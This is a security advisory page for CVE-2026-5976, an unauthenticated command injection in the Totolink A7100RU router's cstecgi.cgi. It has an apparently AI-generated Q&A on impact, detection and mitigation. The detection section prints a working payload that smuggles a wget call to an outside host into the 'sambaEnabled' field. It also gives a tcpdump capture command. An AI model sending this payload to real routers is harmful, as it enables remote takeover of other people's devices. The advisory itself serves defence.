CVE-2026-5976
OS Command Injection in Totolink A7100RU CGI Handler (Remote
Publication date: 2026-04-09
Last updated on: 2026-04-09
Assigner: VulDB
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| totolink | a7100ru | 7.4cu.2313_b20191024 |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-77 | The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component. |
| CWE-78 | The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2026-5976 is a command injection vulnerability in the TOTOLINK A7100RU router, version 7.4cu.2313_b20191024. It exists in the CGI script cstecgi.cgi, specifically in the function that processes the 'sambaEnabled' parameter. This parameter is improperly handled and passed to a system command execution function, allowing an attacker to inject and execute arbitrary operating system commands remotely.
An attacker can exploit this by sending a specially crafted HTTP POST request to the router's /cgi-bin/cstecgi.cgi endpoint with a payload that includes malicious commands in the 'sambaEnabled' parameter. For example, commands like 'wget' can be executed on the router, demonstrating the ability to run arbitrary commands.
How can this vulnerability impact me? :
This vulnerability allows remote attackers to execute arbitrary operating system commands on the affected TOTOLINK A7100RU router without any authentication. This can lead to full compromise of the router, including unauthorized access, control over network traffic, installation of malware, or use of the device as a pivot point for further attacks within the network.
Because the exploit is publicly available, attackers can easily leverage this flaw to compromise vulnerable devices, potentially leading to data breaches, network disruptions, or loss of privacy.
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by monitoring for unusual HTTP POST requests to the /cgi-bin/cstecgi.cgi endpoint, specifically those containing the topicurl parameter set to "setStorageCfg" and the sambaEnabled parameter containing suspicious command injection payloads.
A practical detection method is to capture and inspect network traffic for POST requests with payloads similar to: {"topicurl":"setStorageCfg","sambaEnabled":"`wget 192.168.6.1:7777/testpoc`"}.
You can use tools like tcpdump or Wireshark to capture traffic, and grep or similar text search tools to find suspicious payloads.
Example command to capture HTTP POST requests to the vulnerable CGI script:
- tcpdump -A -s 0 'tcp port 80 and (((ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf0)>>2)) != 0)' | grep -i 'POST /cgi-bin/cstecgi.cgi'
After capturing, search for suspicious sambaEnabled parameters containing backticks or command injection patterns.
What immediate steps should I take to mitigate this vulnerability?
Immediate mitigation steps include restricting access to the vulnerable CGI endpoint /cgi-bin/cstecgi.cgi to trusted networks only, such as by firewall rules or access control lists.
Disable or block remote access to the TOTOLINK A7100RU router's management interface from untrusted networks.
Monitor and block suspicious HTTP POST requests containing the sambaEnabled parameter with unusual characters or command injection patterns.
If possible, update the router firmware to a version that patches this vulnerability or contact the vendor for a security update.
Until a patch is available, consider isolating the device from the internet or untrusted networks to prevent remote exploitation.
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:
The CVE-2026-5976 vulnerability allows remote attackers to execute arbitrary operating system commands on the TOTOLINK A7100RU router due to improper input handling in the cstecgi.cgi script. This kind of vulnerability can lead to unauthorized access, data breaches, and potential compromise of sensitive information.
Such security flaws can negatively impact compliance with common standards and regulations like GDPR and HIPAA, which require organizations to protect personal and sensitive data from unauthorized access and ensure the integrity and confidentiality of their systems.
If exploited, this vulnerability could result in data exposure or system compromise, thereby violating requirements for data protection, incident response, and risk management mandated by these regulations.